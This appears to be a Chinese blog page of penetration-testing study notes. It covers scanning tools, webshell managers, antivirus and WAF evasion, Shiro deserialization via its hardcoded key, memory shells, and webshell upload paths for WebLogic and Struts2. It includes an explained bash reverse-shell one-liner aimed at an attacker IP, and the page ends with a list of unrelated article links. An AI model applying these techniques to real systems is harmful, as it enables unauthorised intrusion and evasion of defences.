当前位置: 首页 > news >正文

记一些零碎的只是点和一些安全工具的使用(这里建议将漏洞原理搞清楚,然后可以尝试手动和使用工具)

目录

信息收集

扫描端口

工具

nmap

TxPortMap

tideFinger

fscan

漏洞扫描

目录扫描

利群使用

不同系统、不同框架的漏洞

OA

weblogic

Struts2

thinkphp漏洞

shiro

蚁剑使用

更高级的连接工具

免杀类型

主机端的免杀

流量层的免杀

安全设备

主机端安全设备

网站端安全设备

云waf:

软waf

硬waf

冰蝎、哥斯拉

普通木马

内存马

shiro反序列化漏洞

漏洞原理

加密

例子

shiro_attack

反弹shell

Weblogic

CVE-2020-14825

struts 2


信息收集

扫描端口

工具

nmap

扫描较慢

扫描一个常见端口1-2分钟

TxPortMap

使用

.TxPortMap -i IP地址 -p 端口(1-65535)

扫描很快

tideFinger

.tideFinger -h IP地址 -p 端口(1-65535)

fscan

扫描URL: fscan -u http://101.200.86.179:46204/

扫描主机: fscan -h 10.10.10.1

不使用ping扫描:fscan -np  -h 10.10.10.1

收集目录、文件

收集ssh服务

漏洞扫描

afrog -t https://example.com  -o result.html

批量扫描:afrog -T urls.txt

目录扫描

dirsearch

指纹识别插件

woppaluzer

蚁剑冰蝎哥斯拉

利群使用

java -jar 名字

不同系统、不同框架的漏洞

OA

不同OA,OA就是一些协同办公的工具

weblogic

JAVA收费的一个框架

Struts2

也是Java的一个框架

thinkphp漏洞

shiro

也是java的一个安全框架

蚁剑使用

解压蚁剑后,点击第一个文件夹

点击AntSword.exe文件,然后这个文件会让你初始化,初始化点击解压后的文件夹中的第二个文件夹也就是antSword-master,然后就会进行初始化,重启后,就变成下面第二张图

右键添加数据

填写数据,url就是木马文件,c密码就是木马文件中的参数,然后点击添加

再之后就可以通过连接进行一些操作

更高级的连接工具

一句话木马就是比较方便,但是免杀性比较差

免杀类型

主机端的免杀

免杀手段:混淆、加密

免杀后安全设备扫描出来的是一段不可知的字符

流量层的免杀

加密:base64,hex,base32,url

编码:aes,rsa,des

分段传输:将流量分多次传输,这样安全设备识别可能会放过

安全设备

主机端安全设备

360安全管家

腾讯安全助手

火绒

defender

瑞星小狮子

卡巴斯基

麦咖啡

天擎

网站端安全设备

waf:

云waf:

阿里云waf

腾讯云waf

华为云waf

创宇盾

这个云waf1可能在dns解析过程中识别你的数据是否有恶意代码,所以绕过的方式就有可以加密分段传输等等,或者直接输入IP地址,直接访问网站IP地址

软waf

这个就像一个应用程序

D盾:https://www.d99net.net/

安全狗:https://www.safedog.cn/

护卫神:https://www.hws.com/

硬waf

安全设备

亚信waf:设备里面配置了一些防护规则

冰蝎、哥斯拉

哥斯拉对于php木马的免杀做的不是很好,但是使用起来和蚁剑差不多

普通木马

php木马

jsp木马

asp木马

aspx木马

内存马

在内存里面运行的木马

现在很多框架是通过.jar服务启动的httpweb,无法使用普通木马,没办法执行,所以我们通过在内存里注入木马也就是让目标主机运行的过程中在内存里放一段特殊的payload,我们可以通过这段payload可以命令执行

这个东西也不是很好找到,清理的话比较简单,重启服务,通过什么服务启动就重启什么服务,或者重启服务器,重启服务器后内存里面的东西都没有了,所以内存马也不见了

shiro反序列化漏洞

漏洞原理

首先shiro使用java写的一个认证框架,这个东西一般出现在登陆框里面,比如说登陆的账号密码就可能出现shiro,很多人把shiro集成到自己的ava项目中直接使用,但是shiro是通过cookie认证的,cookie认证值是shiro自定义的一个加密方式(aes cbc加密,这个东西需要一个iv和一个key解密),shiro的key存在一个硬编码漏洞,这个key是写死在代码当中,并且项目是开源的我们可以在网上查询key,然后iv也是固定的,如果我们知道了iv和key就可以解开aes加密,然后我们可以通过构造利用链达到命令执行的效果。

shiro是通过jar包启服务,它完全没有通过http服务去启动,它都是集成到一个网站里面使用,所以我们一般是通过一些请求包去发现它的。它没有web服务器,这里没办法上传我们的JSP木马。所以我们上传一个内存马

加密

加密是存在cookie里面的

例子

看到下图中圈的东西可以想到shiro反序列化漏洞

JSESSIONID=jsp session id

当看到JSESSIONID可以想到shiro反序列化漏洞

我们再JSESSION中加这个值

如果回复包出现了,下面字段说明这个网站使用的就是shiro框架

可以使用shiro_attack工具

shiro_attack

使用shiro_attack首先是符合上面操作,填写url,然后爆破密钥,爆破利用链及回显

反弹shell

bash -i >& /dev/tcp/IP/端口 0>&1

bash -i:
启动一个交互式的 Bash shell。-i 选项表示交互式,这使得该 shell 可以接收和发送数据。

>& /dev/tcp/KALI_IP/端口:
这部分是关键,它将 Bash 的标准输入和输出重定向到指定的 TCP 连接。
/dev/tcp/KALI_IP/端口 是 Bash 特有的一个特殊文件路径,用于表示一个 TCP 连接。其中:
KALI_IP 应替换为目标机器(通常是攻击者控制的机器)的 IP 地址。
端口 应替换为监听连接的端口号。

0>&1:
将标准输入重定向到标准输出。这确保了输入数据可以通过网络连接发送给远程主机。

总结工作流程:

当命令执行时,Bash 会尝试连接到指定的 KALI_IP 和 端口,并将当前的 Bash shell 的输入输出流重定向到这个连接。
这种方法通常用于建立反向 shell 连接,使攻击者能够从远程机器上执行命令并接收结果,而无需直接通过传统的正向连接方式。

这个东西就是公网连接公网,私网连接私网

Weblogic

CVE-2020-14825

工具破解

发现如下页面就是weblogic

Weblogic和其他框架不一样,我们要找他的网站根目录在那里放着,才可以上传木马

找木马路径用的方法

find / -name _WL_internal

这里使用工具找到

然后我们要找这个路径下面有哪些文件

选bea_wls_intemal文件夹查看,这里会有一个随机的6位数字文件夹

再去查看随机6位数字文件夹

再看war文件夹下有什么,木马就要放在这里

在之后就可以上传木马了

然后就可以访问了,访问也是有技巧的

访问木马路径如下

/u01/oracle/weblogic/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/bea_wls_internal/六位随机字符/war/你的木马名

也就是IP地址加上标红地方

struts 2

后缀是.do或.action的可能是这个框架如下图

然后就是使用相关工具来打

这个框架和weblogic很相似,也是手动去找路径然后再路径下上传木马,找路径是要通过进程来找

找到tomcat路径

查看tomcat文件夹

查看tomcat下webapps文件夹

查看webapps的ROOT路径

然后就可以上传木马了,这里上传的是冰蝎木马

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • 系统设计中15 个最重要的权衡
  • 艾体宝干货 | 如何分析关键网络性能指标?持续接收样品试用申请!
  • 行为验证码——产品
  • easyadmin layui js监听返回结果,进行token验证防止连点
  • 详细说明Java中Map和Set接口的使用方法
  • 全网最适合入门的面向对象编程教程:29 类和对象的Python实现-断言与防御性编程和help函数的使用
  • OpenFeign微服务调用组件
  • php yii2 foreach中使用事务,事务中使用了 continue
  • 快速排序(上)
  • 软件测试--python基础
  • 【Golang 面试 - 进阶题】每日 3 题(二)
  • 一篇文章解决Webpack
  • 【数据结构】了解哈希表,解决哈希冲突,用Java模拟实现哈希桶
  • 数据结构与算法 - 递归
  • 大龄程序员转型攻略:拥抱人工智能,开启新征程
  • android图片蒙层
  • angular2 简述
  • Javascript设计模式学习之Observer(观察者)模式
  • Laravel核心解读--Facades
  • LeetCode541. Reverse String II -- 按步长反转字符串
  • Redis的resp协议
  • Sass 快速入门教程
  • 对象管理器(defineProperty)学习笔记
  • 分享一个自己写的基于canvas的原生js图片爆炸插件
  • 官方新出的 Kotlin 扩展库 KTX,到底帮你干了什么?
  • 聊一聊前端的监控
  • 排序(1):冒泡排序
  • 十年未变!安全,谁之责?(下)
  • 适配mpvue平台的的微信小程序日历组件mpvue-calendar
  • 腾讯视频格式如何转换成mp4 将下载的qlv文件转换成mp4的方法
  • 一个项目push到多个远程Git仓库
  • 教程:使用iPhone相机和openCV来完成3D重建(第一部分) ...
  • ​LeetCode解法汇总2696. 删除子串后的字符串最小长度
  • #微信小程序:微信小程序常见的配置传旨
  • (2)STM32单片机上位机
  • (9)STL算法之逆转旋转
  • (poj1.3.2)1791(构造法模拟)
  • (PyTorch)TCN和RNN/LSTM/GRU结合实现时间序列预测
  • (pytorch进阶之路)扩散概率模型
  • (Redis使用系列) SpringBoot中Redis的RedisConfig 二
  • (附源码)springboot人体健康检测微信小程序 毕业设计 012142
  • (附源码)ssm跨平台教学系统 毕业设计 280843
  • (附源码)计算机毕业设计ssm基于Internet快递柜管理系统
  • (每日持续更新)jdk api之StringBufferInputStream基础、应用、实战
  • (十二)springboot实战——SSE服务推送事件案例实现
  • (转) Face-Resources
  • (转)Linux整合apache和tomcat构建Web服务器
  • (转)Scala的“=”符号简介
  • .ai域名是什么后缀?
  • .bat批处理(十一):替换字符串中包含百分号%的子串
  • .NET Compact Framework 多线程环境下的UI异步刷新
  • .NET Core中如何集成RabbitMQ
  • .net dataexcel winform控件 更新 日志
  • .Net MVC + EF搭建学生管理系统
  • .net 使用$.ajax实现从前台调用后台方法(包含静态方法和非静态方法调用)